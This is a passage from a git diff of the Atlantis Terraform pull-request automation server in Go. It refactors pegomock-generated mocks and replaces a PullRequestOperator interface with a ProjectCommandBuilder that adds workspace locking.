*pegomock.InOrderContext } -func (verifier *VerifierCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *events.Command) *CommitStatusUpdater_Update_OngoingVerification { - params := []pegomock.Param{repo, pull, status, cmd} +func (verifier *VerifierCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command events.CommandName) *CommitStatusUpdater_Update_OngoingVerification { + params := []pegomock.Param{repo, pull, status, command} methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Update", params) return &CommitStatusUpdater_Update_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} } @@ -73,12 +73,12 @@ type CommitStatusUpdater_Update_OngoingVerification struct { methodInvocations []pegomock.MethodInvocation } -func (c *CommitStatusUpdater_Update_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, vcs.CommitStatus, *events.Command) { - repo, pull, status, cmd := c.GetAllCapturedArguments() - return repo[len(repo)-1], pull[len(pull)-1], status[len(status)-1], cmd[len(cmd)-1] +func (c *CommitStatusUpdater_Update_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, vcs.CommitStatus, events.CommandName) { + repo, pull, status, command := c.GetAllCapturedArguments() + return repo[len(repo)-1], pull[len(pull)-1], status[len(status)-1], command[len(command)-1] } -func (c *CommitStatusUpdater_Update_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []vcs.CommitStatus, _param3 []*events.Command) { +func (c *CommitStatusUpdater_Update_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []vcs.CommitStatus, _param3 []events.CommandName) { params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) if len(params) > 0 { _param0 = make([]models.Repo, len(params[0])) @@ -93,16 +93,16 @@ func (c *CommitStatusUpdater_Update_OngoingVerification) GetAllCapturedArguments for u, param := range params[2] { _param2[u] = param.(vcs.CommitStatus) } - _param3 = make([]*events.Command, len(params[3])) + _param3 = make([]events.CommandName, len(params[3])) for u, param := range params[3] { - _param3[u] = param.(*events.Command) + _param3[u] = param.(events.CommandName) } } return } -func (verifier *VerifierCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, res events.CommandResponse) *CommitStatusUpdater_UpdateProjectResult_OngoingVerification { - params := []pegomock.Param{ctx, res} +func (verifier *VerifierCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, commandName events.CommandName, res events.CommandResult) *CommitStatusUpdater_UpdateProjectResult_OngoingVerification { + params := []pegomock.Param{ctx, commandName, res} methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "UpdateProjectResult", params) return &CommitStatusUpdater_UpdateProjectResult_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} } @@ -112,21 +112,25 @@ type CommitStatusUpdater_UpdateProjectResult_OngoingVerification struct { methodInvocations []pegomock.MethodInvocation } -func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetCapturedArguments() (*events.CommandContext, events.CommandResponse) { - ctx, res := c.GetAllCapturedArguments() - return ctx[len(ctx)-1], res[len(res)-1] +func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetCapturedArguments() (*events.CommandContext, events.CommandName, events.CommandResult) { + ctx, commandName, res := c.GetAllCapturedArguments() + return ctx[len(ctx)-1], commandName[len(commandName)-1], res[len(res)-1] } -func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []events.CommandResponse) { +func (c *CommitStatusUpdater_UpdateProjectResult_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []events.CommandName, _param2 []events.CommandResult) { params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) if len(params) > 0 { _param0 = make([]*events.CommandContext, len(params[0])) for u, param := range params[0] { _param0[u] = param.(*events.CommandContext) } - _param1 = make([]events.CommandResponse, len(params[1])) + _param1 = make([]events.CommandName, len(params[1])) for u, param := range params[1] { - _param1[u] = param.(events.CommandResponse) + _param1[u] = param.(events.CommandName) + } + _param2 = make([]events.CommandResult, len(params[2])) + for u, param := range params[2] { + _param2[u] = param.(events.CommandResult) } } return diff --git a/server/events/mocks/mock_event_parsing.go b/server/events/mocks/mock_event_parsing.go index 007f823a40..1c1feaf31c 100644 --- a/server/events/mocks/mock_event_parsing.go +++ b/server/events/mocks/mock_event_parsing.go @@ -44,12 +44,13 @@ func (mock *MockEventParsing) ParseGithubIssueCommentEvent(comment *github.Issue return ret0, ret1, ret2, ret3 } -func (mock *MockEventParsing) ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, error) { +func (mock *MockEventParsing) ParseGithubPull(pull *github.PullRequest) (models.PullRequest, models.Repo, models.Repo, error) { params := []pegomock.Param{pull} - result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGithubPull", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGithubPull", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) var ret0 models.PullRequest var ret1 models.Repo - var ret2 error + var ret2 models.Repo + var ret3 error if len(result) != 0 { if result[0] != nil { ret0 = result[0].(models.PullRequest) @@ -58,10 +59,41 @@ func (mock *MockEventParsing) ParseGithubPull(pull *github.PullRequest) (models. ret1 = result[1].(models.Repo) } if result[2] != nil { - ret2 = result[2].(error) + ret2 = result[2].(models.Repo) + } + if result[3] != nil { + ret3 = result[3].(error) + } + } + return ret0, ret1, ret2, ret3 +} + +func (mock *MockEventParsing) ParseGithubPullEvent(pullEvent *github.PullRequestEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) { + params := []pegomock.Param{pullEvent} + result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGithubPullEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.User)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 models.PullRequest + var ret1 models.Repo + var ret2 models.Repo + var ret3 models.User + var ret4 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(models.PullRequest) + } + if result[1] != nil { + ret1 = result[1].(models.Repo) + } + if result[2] != nil { + ret2 = result[2].(models.Repo) + } + if result[3] != nil { + ret3 = result[3].(models.User) + } + if result[4] != nil { + ret4 = result[4].(error) } } - return ret0, ret1, ret2 + return ret0, ret1, ret2, ret3, ret4 } func (mock *MockEventParsing) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error) { @@ -80,13 +112,14 @@ func (mock *MockEventParsing) ParseGithubRepo(ghRepo *github.Repository) (models return ret0, ret1 } -func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, error) { +func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) { params := []pegomock.Param{event} - result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + result := pegomock.GetGenericMockFrom(mock).Invoke("ParseGitlabMergeEvent", params, []reflect.Type{reflect.TypeOf((*models.PullRequest)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.Repo)(nil)).Elem(), reflect.TypeOf((*models.User)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) var ret0 models.PullRequest var ret1 models.Repo var ret2 models.Repo - var ret3 error + var ret3 models.User + var ret4 error if len(result) != 0 { if result[0] != nil { ret0 = result[0].(models.PullRequest) @@ -98,10 +131,13 @@ func (mock *MockEventParsing) ParseGitlabMergeEvent(event go_gitlab.MergeEvent) ret2 = result[2].(models.Repo) } if result[3] != nil { - ret3 = result[3].(error) + ret3 = result[3].(models.User) + } + if result[4] != nil { + ret4 = result[4].(error) } } - return ret0, ret1, ret2, ret3 + return ret0, ret1, ret2, ret3, ret4 } func (mock *MockEventParsing) ParseGitlabMergeCommentEvent(event go_gitlab.MergeCommentEvent) (models.Repo, models.Repo, models.User, error) { @@ -212,6 +248,33 @@ func (c *EventParsing_ParseGithubPull_OngoingVerification) GetAllCapturedArgumen return } +func (verifier *VerifierEventParsing) ParseGithubPullEvent(pullEvent *github.PullRequestEvent) *EventParsing_ParseGithubPullEvent_OngoingVerification { + params := []pegomock.Param{pullEvent} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ParseGithubPullEvent", params) + return &EventParsing_ParseGithubPullEvent_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type EventParsing_ParseGithubPullEvent_OngoingVerification struct { + mock *MockEventParsing + methodInvocations []pegomock.MethodInvocation +} + +func (c *EventParsing_ParseGithubPullEvent_OngoingVerification) GetCapturedArguments() *github.PullRequestEvent { + pullEvent := c.GetAllCapturedArguments() + return pullEvent[len(pullEvent)-1] +} + +func (c *EventParsing_ParseGithubPullEvent_OngoingVerification) GetAllCapturedArguments() (_param0 []*github.PullRequestEvent) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*github.PullRequestEvent, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*github.PullRequestEvent) + } + } + return +} + func (verifier *VerifierEventParsing) ParseGithubRepo(ghRepo *github.Repository) *EventParsing_ParseGithubRepo_OngoingVerification { params := []pegomock.Param{ghRepo} methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ParseGithubRepo", params) diff --git a/server/events/mocks/mock_executor.go b/server/events/mocks/mock_executor.go index f3c9ce749b..208f43050e 100644 --- a/server/events/mocks/mock_executor.go +++ b/server/events/mocks/mock_executor.go @@ -18,13 +18,13 @@ func NewMockExecutor() *MockExecutor { return &MockExecutor{fail: pegomock.GlobalFailHandler} } -func (mock *MockExecutor) Execute(ctx *events.CommandContext) events.CommandResponse { +func (mock *MockExecutor) Execute(ctx *events.CommandContext) events.CommandResult { params := []pegomock.Param{ctx} - result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()}) - var ret0 events.CommandResponse + result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.CommandResult)(nil)).Elem()}) + var ret0 events.CommandResult if len(result) != 0 { if result[0] != nil { - ret0 = result[0].(events.CommandResponse) + ret0 = result[0].(events.CommandResult) } } return ret0 diff --git a/server/events/mocks/mock_project_command_builder.go b/server/events/mocks/mock_project_command_builder.go new file mode 100644 index 0000000000..f779acab36 --- /dev/null +++ b/server/events/mocks/mock_project_command_builder.go @@ -0,0 +1,175 @@ +// Automatically generated by pegomock. DO NOT EDIT! +// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectCommandBuilder) + +package mocks + +import ( + "reflect" + + pegomock "github.com/petergtz/pegomock" + events "github.com/runatlantis/atlantis/server/events" + models "github.com/runatlantis/atlantis/server/events/models" +) + +type MockProjectCommandBuilder struct { + fail func(message string, callerSkip ...int) +} + +func NewMockProjectCommandBuilder() *MockProjectCommandBuilder { + return &MockProjectCommandBuilder{fail: pegomock.GlobalFailHandler} +} + +func (mock *MockProjectCommandBuilder) BuildAutoplanCommands(ctx *events.CommandContext) ([]models.ProjectCommandContext, error) { + params := []pegomock.Param{ctx} + result := pegomock.GetGenericMockFrom(mock).Invoke("BuildAutoplanCommands", params, []reflect.Type{reflect.TypeOf((*[]models.ProjectCommandContext)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 []models.ProjectCommandContext + var ret1 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].([]models.ProjectCommandContext) + } + if result[1] != nil { + ret1 = result[1].(error) + } + } + return ret0, ret1 +} + +func (mock *MockProjectCommandBuilder) BuildPlanCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) (models.ProjectCommandContext, error) { + params := []pegomock.Param{ctx, commentCommand} + result := pegomock.GetGenericMockFrom(mock).Invoke("BuildPlanCommand", params, []reflect.Type{reflect.TypeOf((*models.ProjectCommandContext)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 models.ProjectCommandContext + var ret1 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(models.ProjectCommandContext) + } + if result[1] != nil { + ret1 = result[1].(error) + } + } + return ret0, ret1 +} + +func (mock *MockProjectCommandBuilder) BuildApplyCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) (models.ProjectCommandContext, error) { + params := []pegomock.Param{ctx, commentCommand} + result := pegomock.GetGenericMockFrom(mock).Invoke("BuildApplyCommand", params, []reflect.Type{reflect.TypeOf((*models.ProjectCommandContext)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 models.ProjectCommandContext + var ret1 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(models.ProjectCommandContext) + } + if result[1] != nil { + ret1 = result[1].(error) + } + } + return ret0, ret1 +} + +func (mock *MockProjectCommandBuilder) VerifyWasCalledOnce() *VerifierProjectCommandBuilder { + return &VerifierProjectCommandBuilder{mock, pegomock.Times(1), nil} +} + +func (mock *MockProjectCommandBuilder) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectCommandBuilder { + return &VerifierProjectCommandBuilder{mock, invocationCountMatcher, nil} +} + +func (mock *MockProjectCommandBuilder) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectCommandBuilder { + return &VerifierProjectCommandBuilder{mock, invocationCountMatcher, inOrderContext} +} + +type VerifierProjectCommandBuilder struct { + mock *MockProjectCommandBuilder + invocationCountMatcher pegomock.Matcher + inOrderContext *pegomock.InOrderContext +} + +func (verifier *VerifierProjectCommandBuilder) BuildAutoplanCommands(ctx *events.CommandContext) *ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification { + params := []pegomock.Param{ctx} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "BuildAutoplanCommands", params) + return &ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification struct { + mock *MockProjectCommandBuilder + methodInvocations []pegomock.MethodInvocation +} + +func (c *ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification) GetCapturedArguments() *events.CommandContext { + ctx := c.GetAllCapturedArguments() + return ctx[len(ctx)-1] +} + +func (c *ProjectCommandBuilder_BuildAutoplanCommands_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*events.CommandContext, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*events.CommandContext) + } + } + return +} + +func (verifier *VerifierProjectCommandBuilder) BuildPlanCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) *ProjectCommandBuilder_BuildPlanCommand_OngoingVerification { + params := []pegomock.Param{ctx, commentCommand} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "BuildPlanCommand", params) + return &ProjectCommandBuilder_BuildPlanCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type ProjectCommandBuilder_BuildPlanCommand_OngoingVerification struct { + mock *MockProjectCommandBuilder + methodInvocations []pegomock.MethodInvocation +} + +func (c *ProjectCommandBuilder_BuildPlanCommand_OngoingVerification) GetCapturedArguments() (*events.CommandContext, *events.CommentCommand) { + ctx, commentCommand := c.GetAllCapturedArguments() + return ctx[len(ctx)-1], commentCommand[len(commentCommand)-1] +} + +func (c *ProjectCommandBuilder_BuildPlanCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []*events.CommentCommand) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*events.CommandContext, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*events.CommandContext) + } + _param1 = make([]*events.CommentCommand, len(params[1])) + for u, param := range params[1] { + _param1[u] = param.(*events.CommentCommand) + } + } + return +} + +func (verifier *VerifierProjectCommandBuilder) BuildApplyCommand(ctx *events.CommandContext, commentCommand *events.CommentCommand) *ProjectCommandBuilder_BuildApplyCommand_OngoingVerification { + params := []pegomock.Param{ctx, commentCommand} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "BuildApplyCommand", params) + return &ProjectCommandBuilder_BuildApplyCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type ProjectCommandBuilder_BuildApplyCommand_OngoingVerification struct { + mock *MockProjectCommandBuilder + methodInvocations []pegomock.MethodInvocation +} + +func (c *ProjectCommandBuilder_BuildApplyCommand_OngoingVerification) GetCapturedArguments() (*events.CommandContext, *events.CommentCommand) { + ctx, commentCommand := c.GetAllCapturedArguments() + return ctx[len(ctx)-1], commentCommand[len(commentCommand)-1] +} + +func (c *ProjectCommandBuilder_BuildApplyCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext, _param1 []*events.CommentCommand) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*events.CommandContext, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*events.CommandContext) + } + _param1 = make([]*events.CommentCommand, len(params[1])) + for u, param := range params[1] { + _param1[u] = param.(*events.CommentCommand) + } + } + return +} diff --git a/server/events/mocks/mock_pull_request_operator.go b/server/events/mocks/mock_pull_request_operator.go deleted file mode 100644 index 443636863a..0000000000 --- a/server/events/mocks/mock_pull_request_operator.go +++ /dev/null @@ -1,154 +0,0 @@ -// Automatically generated by pegomock. DO NOT EDIT! -// Source: github.com/runatlantis/atlantis/server/events (interfaces: PullRequestOperator) - -package mocks - -import ( - "reflect" - - pegomock "github.com/petergtz/pegomock" - events "github.com/runatlantis/atlantis/server/events" -) - -type MockPullRequestOperator struct { - fail func(message string, callerSkip ...int) -} - -func NewMockPullRequestOperator() *MockPullRequestOperator { - return &MockPullRequestOperator{fail: pegomock.GlobalFailHandler} -} - -func (mock *MockPullRequestOperator) Autoplan(ctx *events.CommandContext) events.CommandResponse { - params := []pegomock.Param{ctx} - result := pegomock.GetGenericMockFrom(mock).Invoke("Autoplan", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()}) - var ret0 events.CommandResponse - if len(result) != 0 { - if result[0] != nil { - ret0 = result[0].(events.CommandResponse) - } - } - return ret0 -} - -func (mock *MockPullRequestOperator) PlanViaComment(ctx *events.CommandContext) events.CommandResponse { - params := []pegomock.Param{ctx} - result := pegomock.GetGenericMockFrom(mock).Invoke("PlanViaComment", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()}) - var ret0 events.CommandResponse - if len(result) != 0 { - if result[0] != nil { - ret0 = result[0].(events.CommandResponse) - } - } - return ret0 -} - -func (mock *MockPullRequestOperator) ApplyViaComment(ctx *events.CommandContext) events.CommandResponse { - params := []pegomock.Param{ctx} - result := pegomock.GetGenericMockFrom(mock).Invoke("ApplyViaComment", params, []reflect.Type{reflect.TypeOf((*events.CommandResponse)(nil)).Elem()}) - var ret0 events.CommandResponse - if len(result) != 0 { - if result[0] != nil { - ret0 = result[0].(events.CommandResponse) - } - } - return ret0 -} - -func (mock *MockPullRequestOperator) VerifyWasCalledOnce() *VerifierPullRequestOperator { - return &VerifierPullRequestOperator{mock, pegomock.Times(1), nil} -} - -func (mock *MockPullRequestOperator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierPullRequestOperator { - return &VerifierPullRequestOperator{mock, invocationCountMatcher, nil} -} - -func (mock *MockPullRequestOperator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierPullRequestOperator { - return &VerifierPullRequestOperator{mock, invocationCountMatcher, inOrderContext} -} - -type VerifierPullRequestOperator struct { - mock *MockPullRequestOperator - invocationCountMatcher pegomock.Matcher - inOrderContext *pegomock.InOrderContext -} - -func (verifier *VerifierPullRequestOperator) Autoplan(ctx *events.CommandContext) *PullRequestOperator_Autoplan_OngoingVerification { - params := []pegomock.Param{ctx} - methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Autoplan", params) - return &PullRequestOperator_Autoplan_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} -} - -type PullRequestOperator_Autoplan_OngoingVerification struct { - mock *MockPullRequestOperator - methodInvocations []pegomock.MethodInvocation -} - -func (c *PullRequestOperator_Autoplan_OngoingVerification) GetCapturedArguments() *events.CommandContext { - ctx := c.GetAllCapturedArguments() - return ctx[len(ctx)-1] -} - -func (c *PullRequestOperator_Autoplan_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { - params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) - if len(params) > 0 { - _param0 = make([]*events.CommandContext, len(params[0])) - for u, param := range params[0] { - _param0[u] = param.(*events.CommandContext) - } - } - return -} - -func (verifier *VerifierPullRequestOperator) PlanViaComment(ctx *events.CommandContext) *PullRequestOperator_PlanViaComment_OngoingVerification { - params := []pegomock.Param{ctx} - methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "PlanViaComment", params) - return &PullRequestOperator_PlanViaComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} -} - -type PullRequestOperator_PlanViaComment_OngoingVerification struct { - mock *MockPullRequestOperator - methodInvocations []pegomock.MethodInvocation -} - -func (c *PullRequestOperator_PlanViaComment_OngoingVerification) GetCapturedArguments() *events.CommandContext { - ctx := c.GetAllCapturedArguments() - return ctx[len(ctx)-1] -} - -func (c *PullRequestOperator_PlanViaComment_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { - params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) - if len(params) > 0 { - _param0 = make([]*events.CommandContext, len(params[0])) - for u, param := range params[0] { - _param0[u] = param.(*events.CommandContext) - } - } - return -} - -func (verifier *VerifierPullRequestOperator) ApplyViaComment(ctx *events.CommandContext) *PullRequestOperator_ApplyViaComment_OngoingVerification { - params := []pegomock.Param{ctx} - methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ApplyViaComment", params) - return &PullRequestOperator_ApplyViaComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} -} - -type PullRequestOperator_ApplyViaComment_OngoingVerification struct { - mock *MockPullRequestOperator - methodInvocations []pegomock.MethodInvocation -} - -func (c *PullRequestOperator_ApplyViaComment_OngoingVerification) GetCapturedArguments() *events.CommandContext { - ctx := c.GetAllCapturedArguments() - return ctx[len(ctx)-1] -} - -func (c *PullRequestOperator_ApplyViaComment_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { - params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) - if len(params) > 0 { - _param0 = make([]*events.CommandContext, len(params[0])) - for u, param := range params[0] { - _param0[u] = param.(*events.CommandContext) - } - } - return -} diff --git a/server/events/models/models_test.go b/server/events/models/models_test.go index 0dbb4f49ff..5883f21936 100644 --- a/server/events/models/models_test.go +++ b/server/events/models/models_test.go @@ -92,3 +92,10 @@ func TestNewRepo_HTTPSAuth(t *testing.T) { Name: "repo", }, repo) } + +func TestProject_String(t *testing.T) { + Equals(t, "repofullname=owner/repo path=my/path", (models.Project{ + RepoFullName: "owner/repo", + Path: "my/path", + }).String()) +} diff --git a/server/events/pull_request_operator.go b/server/events/project_command_builder.go similarity index 62% rename from server/events/pull_request_operator.go rename to server/events/project_command_builder.go index fabad33d0f..90f2324dd8 100644 --- a/server/events/pull_request_operator.go +++ b/server/events/project_command_builder.go @@ -15,41 +15,45 @@ import ( "github.com/runatlantis/atlantis/server/logging" ) -//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_pull_request_operator.go PullRequestOperator +//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_command_builder.go ProjectCommandBuilder -type PullRequestOperator interface { - Autoplan(ctx *CommandContext) CommandResponse - PlanViaComment(ctx *CommandContext) CommandResponse - ApplyViaComment(ctx *CommandContext) CommandResponse +type ProjectCommandBuilder interface { + BuildAutoplanCommands(ctx *CommandContext) ([]models.ProjectCommandContext, error) + BuildPlanCommand(ctx *CommandContext, commentCommand *CommentCommand) (models.ProjectCommandContext, error) + BuildApplyCommand(ctx *CommandContext, commentCommand *CommentCommand) (models.ProjectCommandContext, error) } -type DefaultPullRequestOperator struct { - TerraformExecutor TerraformExec - DefaultTFVersion *version.Version - ParserValidator *yaml.ParserValidator - ProjectFinder ProjectFinder - VCSClient vcs.ClientProxy - Workspace AtlantisWorkspace - ProjectOperator ProjectOperator +type DefaultProjectCommandBuilder struct { + ParserValidator *yaml.ParserValidator + ProjectFinder ProjectFinder + VCSClient vcs.ClientProxy + Workspace AtlantisWorkspace + AtlantisWorkspaceLocker AtlantisWorkspaceLocker } type TerraformExec interface { RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) } -func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandResponse { - // check out repo to parse atlantis.yaml - // this will check out the repo to a * dir - repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) +func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext) ([]models.ProjectCommandContext, error) { + // Need to lock the workspace we're about to clone to. + workspace := DefaultWorkspace + unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, workspace, ctx.Pull.Num) if err != nil { - return CommandResponse{Error: err} + return nil, err + } + defer unlockFn() + + repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, workspace) + if err != nil { + return nil, err } // Parse config file if it exists. ctx.Log.Debug("parsing config file") config, err := p.ParserValidator.ReadConfig(repoDir) if err != nil && !os.IsNotExist(err) { - return CommandResponse{Error: err} + return nil, err } noAtlantisYAML := os.IsNotExist(err) if noAtlantisYAML { @@ -61,11 +65,11 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon // We'll need the list of modified files. modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull) if err != nil { - return CommandResponse{Error: err} + return nil, err } ctx.Log.Debug("%d files were modified in this pull request", len(modifiedFiles)) - // Prepare the project contexts so the ProjectOperator can execute. + // Prepare the project contexts so the ProjectCommandRunner can execute. var projCtxs []models.ProjectCommandContext // If there is no config file, then we try to plan for each project that @@ -93,7 +97,7 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon // in the config file. matchingProjects, err := p.matchingProjects(ctx.Log, modifiedFiles, config) if err != nil { - return CommandResponse{Error: err} + return nil, err } ctx.Log.Info("%d projects are to be autoplanned based on their when_modified config", len(matchingProjects)) @@ -120,22 +124,21 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon }) } } + return projCtxs, nil +} + +func (p *DefaultProjectCommandBuilder) BuildPlanCommand(ctx *CommandContext, cmd *CommentCommand) (models.ProjectCommandContext, error) { + var projCtx models.ProjectCommandContext - // Execute the operations. - var results []ProjectResult - for _, pCtx := range projCtxs { - res := p.ProjectOperator.Plan(pCtx, nil) - res.Path = pCtx.RepoRelPath - res.Workspace = pCtx.Workspace - results = append(results, res) + unlockFn, err := p.AtlantisWorkspaceLocker.TryLock2(ctx.BaseRepo.FullName, cmd.Workspace, ctx.Pull.Num) + if err != nil { + return projCtx, err } - return CommandResponse{ProjectResults: results} -} + defer unlockFn() -func (p *DefaultPullRequestOperator) PlanViaComment(ctx *CommandContext) CommandResponse { - repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) + repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, cmd.Workspace) if err != nil { - return CommandResponse{Error: err} + return projCtx, err } var projCfg *valid.Project @@ -144,55 +147,49 @@ func (p *DefaultPullRequestOperator) PlanViaComment(ctx *CommandContext) Command // Parse config file if it exists. config, err := 